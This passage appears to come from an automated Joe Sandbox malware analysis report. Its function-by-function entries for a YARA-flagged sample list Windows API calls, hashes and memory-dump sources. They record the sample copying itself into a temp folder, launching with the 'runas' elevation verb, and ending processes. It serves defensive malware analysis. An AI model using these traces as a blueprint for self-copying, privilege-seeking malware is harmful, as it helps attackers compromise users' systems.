                                                                        • Opcode ID: 29f35905ea2ccf4cfebde689555aa7b334c838f3120d6312d5c2abd0bf35bc3b
                                                                        • Instruction ID: fa7ca37b244b351f3447020312105d72e287c2cd5c6a7e201da3594c0c216cc8
                                                                        • Opcode Fuzzy Hash: 29f35905ea2ccf4cfebde689555aa7b334c838f3120d6312d5c2abd0bf35bc3b
                                                                        • Instruction Fuzzy Hash: 56219030A08A0C9FDB58DF5CD845BF9BBE4FB69321F00422ED04AD3651DB75A856CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Control-flow graph node and edge data omitted. API calls named in the graph: FindCloseChangeNotification
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 0d741c969d74f6c0f64a54106d8c181f73904dc691372159207ecd2eb8df440e
                                                                        • Instruction ID: 89514e2fec566e758acc121034b8bd5fc183368698cb4b3eda858544288c6356
                                                                        • Opcode Fuzzy Hash: 0d741c969d74f6c0f64a54106d8c181f73904dc691372159207ecd2eb8df440e
                                                                        • Instruction Fuzzy Hash: AA218E31A08A0C9FDB58DF5CD845BF9BBE1FBA5321F00422ED049D3651DB75A856CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(010BE000,?,010BA9A0,010BAF26,?,010BE000,010BAF26,010BE000), ref: 010BA9C3
                                                                        • TerminateProcess.KERNEL32(00000000,?,010BA9A0,010BAF26,?,010BE000,010BAF26,010BE000), ref: 010BA9CA
                                                                        • ExitProcess.KERNEL32 ref: 010BA9DC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: c9b75e0769b6c8a80b1f15f7bb6bf3ddb2051c34648321213cfa371f678cd276
                                                                        • Instruction ID: 2cf2f334504393279e4b210428687e2eb9a4969f1172758ec6d7f092d9ecb3a5
                                                                        • Opcode Fuzzy Hash: c9b75e0769b6c8a80b1f15f7bb6bf3ddb2051c34648321213cfa371f678cd276
                                                                        • Instruction Fuzzy Hash: B4E0B635100108EFDB226B58D988AD93F69EB91342F154465F98587121CB3AED92EB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 010C2368: CreateFileW.KERNELBASE(00000000,00000000,?,010C2758,?,?,00000000,?,010C2758,00000000,0000000C), ref: 010C2385
                                                                        • GetLastError.KERNEL32 ref: 010C27C3
                                                                        • __dosmaperr.LIBCMT ref: 010C27CA
                                                                        • GetFileType.KERNELBASE(00000000), ref: 010C27D6
                                                                        • GetLastError.KERNEL32 ref: 010C27E0
                                                                        • __dosmaperr.LIBCMT ref: 010C27E9
                                                                        • CloseHandle.KERNEL32(00000000), ref: 010C2809
                                                                        • CloseHandle.KERNEL32(010BD4F0), ref: 010C2956
                                                                        • GetLastError.KERNEL32 ref: 010C2988
                                                                        • __dosmaperr.LIBCMT ref: 010C298F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID: H
                                                                        • API String ID: 4237864984-2852464175
                                                                        • Opcode ID: 8efbaa2ac37c0c01fb94b676482dfa31b144755afb50435a52a3d3d40f0f41b0
                                                                        • Instruction ID: 3ba03ecd5d7be83dfea74e99c79144478858484f078bccd748442457319c1c37
                                                                        • Opcode Fuzzy Hash: 8efbaa2ac37c0c01fb94b676482dfa31b144755afb50435a52a3d3d40f0f41b0
                                                                        • Instruction Fuzzy Hash: E4A10332A041459FCF29DF68D891BEE3BF1AB0A724F18019DF891AB391CB359856CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Control-flow graph node and edge data omitted. API calls named in the graph: GetTempPathA, CopyFileA, GetModuleFileNameA, GetFileAttributesA, CreateDirectoryA
                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 010A9C90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PathTemp
                                                                        • String ID:
                                                                        • API String ID: 2920410445-0
                                                                        • Opcode ID: 433dbaaaa8e97717dafd1e54a266c99e9684b167404111a18706c64957ae7313
                                                                        • Instruction ID: 56f5c4d07cb266e130d3efdc71e5b9e186c6332f48f42cae646e169fc0d0d7a1
                                                                        • Opcode Fuzzy Hash: 433dbaaaa8e97717dafd1e54a266c99e9684b167404111a18706c64957ae7313
                                                                        • Instruction Fuzzy Hash: 24A1C3B0A00258DBDF20DB64CC84BDDBBB9AB45304F9045D8D64967282DB755FC8CFA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                          • Part of subcall function 010A41D0: ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 010A3BA4
                                                                        • Sleep.KERNEL32(000003E8), ref: 010A42B9
                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,C73353B8), ref: 010A4364
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryExecuteShellSleep
                                                                        • String ID: runas
                                                                        • API String ID: 1553058795-4000483414
                                                                        • Opcode ID: 0745a717ef98bf9b8f258d0fe3a09248a853543d6c3ac6b5b2d4613fd475b8ba
                                                                        • Instruction ID: d03131edd6bbebc26632da673bbbbdf9b14d0f4c1a9f13f71df6721009056670
                                                                        • Opcode Fuzzy Hash: 0745a717ef98bf9b8f258d0fe3a09248a853543d6c3ac6b5b2d4613fd475b8ba
                                                                        • Instruction Fuzzy Hash: A7A17B71A10204ABDB08EBB8CD857DDBF72EF91314F98825CE481AB3C5DB759A4087D2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 010AA04D
                                                                        • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 010AA068
                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 010AA1A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$AttributesCopyCreateDirectory
                                                                        • String ID:
                                                                        • API String ID: 210682061-0
                                                                        • Opcode ID: 3b58457c27eb7b4c03c395593d5bd38b90b94f93edb0ac625fd50a8fbd4bea93
                                                                        • Instruction ID: 9857aceee326c0f86705fc45e239476d08fc11ea0c6777adbd70f9899dc46d81
                                                                        • Opcode Fuzzy Hash: 3b58457c27eb7b4c03c395593d5bd38b90b94f93edb0ac625fd50a8fbd4bea93
                                                                        • Instruction Fuzzy Hash: A441E5B1A002188BDB24DB68CCC57DCBB75AF55314F9401DCE689A72C2DB356AC4CF6A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 010C0A5E
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 010C0ACC
                                                                          • Part of subcall function 010C0971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,010C4B40,?,00000000,00000000), ref: 010C0A13
                                                                          • Part of subcall function 010BDB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BDB6E
                                                                        • _free.LIBCMT ref: 010C0ABD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 2560199156-0
                                                                        • Opcode ID: 90ed20c70ff94a156ba73da14993e1a7e17243b4a37b3cd6a8f70cf0c5b17114
                                                                        • Instruction ID: 7604f76e4ec872325ed4ff149cd80aff511bc13d08eb50ff3a8ceefe010c1c11
                                                                        • Opcode Fuzzy Hash: 90ed20c70ff94a156ba73da14993e1a7e17243b4a37b3cd6a8f70cf0c5b17114
                                                                        • Instruction Fuzzy Hash: 2C01D87A601215FF732157BE1C88CBF7CADCAD2E54315022CBA44D2208FA558D41CAB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 010A9EB5
                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 010AA1A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CopyModuleName
                                                                        • String ID:
                                                                        • API String ID: 4108865673-0
                                                                        • Opcode ID: f42c5665bdce5a69169036ad91104892e6ccf6a12ebf6f7f10b76ae8ecf18cb5
                                                                        • Instruction ID: d5553405f3ae0c57f7162bcc2def22e8d1107454e286414178104c8d8a854638
                                                                        • Opcode Fuzzy Hash: f42c5665bdce5a69169036ad91104892e6ccf6a12ebf6f7f10b76ae8ecf18cb5
                                                                        • Instruction Fuzzy Hash: AAC127B1B001188BDB24DB68CC847DDBB75AB55318F8482D8D6C9A72C2DB359EC4CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 4c789c6995f40b0a99d1693125dd911beb16006696065cf702f5582db04d6325
                                                                        • Instruction ID: add069c3004cb9737c17b97a4edd6d39546c052fe8370ee04067ba6b3188238b
                                                                        • Opcode Fuzzy Hash: 4c789c6995f40b0a99d1693125dd911beb16006696065cf702f5582db04d6325
                                                                        • Instruction Fuzzy Hash: 3B41A236A002049BDB25DFA8C9C0ADEB7F5EF89B14B1544A9E995EB341D731ED02CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        • _free.LIBCMT ref: 010C4DB0
                                                                          • Part of subcall function 010BDB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BDB6E
                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,010C0E8A,?,00000004,00000002,?,?,?,010BC625,?,00000002), ref: 010C4DEC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap$_free
                                                                        • String ID:
                                                                        • API String ID: 1482568997-0
                                                                        • Opcode ID: 2a2aca3aaf329a0a7a792393abb306a3be5a51c01a23730b5e95ff6bb48819bb
                                                                        • Instruction ID: e9b7500868d93a350bac9bf1f903cfbe892e0c9bb7f9c269bee474d5620a9d49
                                                                        • Opcode Fuzzy Hash: 2a2aca3aaf329a0a7a792393abb306a3be5a51c01a23730b5e95ff6bb48819bb
                                                                        • Instruction Fuzzy Hash: 52F0C2312402166B9B223B2AAC50FEF3B98BF91E70B11026DFDD4DA280DB20C440CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 010B5F53
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID:
                                                                        • API String ID: 118556049-0
                                                                        • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                        • Instruction ID: 5e9d0b50bd5b72d759fe1e214160451731f4e53cc8b44f1824e61b96b2b05104
                                                                        • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                        • Instruction Fuzzy Hash: B731F6717002019BD7189E7C9CC05EEFBE9EB55320B1443BEE9A5C7381D7709D448752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 010A218E
                                                                          • Part of subcall function 010B8483: RaiseException.KERNEL32(E06D7363,00000001,00000003,010A216C,?,?,?,010A216C,?,010D6D1C), ref: 010B84E3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionRaise___std_exception_copy
                                                                        • String ID:
                                                                        • API String ID: 3109751735-0
                                                                        • Opcode ID: 3be86983fbe447236edda2a052303c6a023b0b3ba269d88372f5bcb4268513fb
                                                                        • Instruction ID: 45febd560439d9a1bb2024e573fdb301ae14ef971a448772e47e6c07956a9c7e
                                                                        • Opcode Fuzzy Hash: 3be86983fbe447236edda2a052303c6a023b0b3ba269d88372f5bcb4268513fb
                                                                        • Instruction Fuzzy Hash: DE01D67580030E67CB14FBE8EC809DDBBAC9E24110B508576FA94AA590FF74E55486D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __wsopen_s
                                                                        • String ID:
                                                                        • API String ID: 3347428461-0
                                                                        • Opcode ID: 8e5cb70d91ee43c71b8f501c53143b0094c83c0b74f9bf6b0e766de155b6fe42
                                                                        • Instruction ID: 7d64d87d8e339fbd5862ff6eafbe599454b3e2b061f42aa1c49926c466f8439a
                                                                        • Opcode Fuzzy Hash: 8e5cb70d91ee43c71b8f501c53143b0094c83c0b74f9bf6b0e766de155b6fe42
                                                                        • Instruction Fuzzy Hash: 73112A71A0420AAFCF05DF98E9409DF7BF4EF48318F0540A9F809EB251E671EA11CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 010BF925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,010BE0E6,00000001,00000364,00000006,000000FF,?,?,010B8272,?), ref: 010BF966
                                                                        • _free.LIBCMT ref: 010BEDC5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                        • Instruction ID: 9934409c5914ff24605f8765a7216b99775fd595caeffac18638ba5adc355522
                                                                        • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                        • Instruction Fuzzy Hash: 7201F972604317ABC3219F9DD8C4ADEFBD8EB053B0F15066AE595A76C0E7B06910C7A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                        • Instruction ID: 30e6725a709c00c4e7141b270e992022222ef69c2e78f40e185473489d96acb0
                                                                        • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                        • Instruction Fuzzy Hash: 0F014F72C0015EBFCF01AFA89C00AEE7FF5AF18214F144569E955E2190E6318A60DF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,010BE0E6,00000001,00000364,00000006,000000FF,?,?,010B8272,?), ref: 010BF966
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 2a33a97d9cf3e97cf741c2db1c7bcd579af8d9485345aa1c706e447110413de2
                                                                        • Instruction ID: 9a428bd56fc84ea21f2f0dfb25483ec017945044c3f31400757ae605d5f2d876
                                                                        • Opcode Fuzzy Hash: 2a33a97d9cf3e97cf741c2db1c7bcd579af8d9485345aa1c706e447110413de2
                                                                        • Instruction Fuzzy Hash: 19F08931665327B7AB627A3A9CC4BDB3B99AF617B0B148161EDD5D7284CB30DC0187E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BDB6E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: b91df49410417f9be29c0e8b0ad3592083371b7712393691a93128069297dbc7
                                                                        • Instruction ID: 29006c3d79faa666eb62a651513cb855e1d197de80c5f7c149f682a421e4a1b7
                                                                        • Opcode Fuzzy Hash: b91df49410417f9be29c0e8b0ad3592083371b7712393691a93128069297dbc7
                                                                        • Instruction Fuzzy Hash: D1E0E531140212E7EA7126F99C80FDAFEC8AB513B8F040060EDD597280CB24C80083E9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,010C2758,?,?,00000000,?,010C2758,00000000,0000000C), ref: 010C2385
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
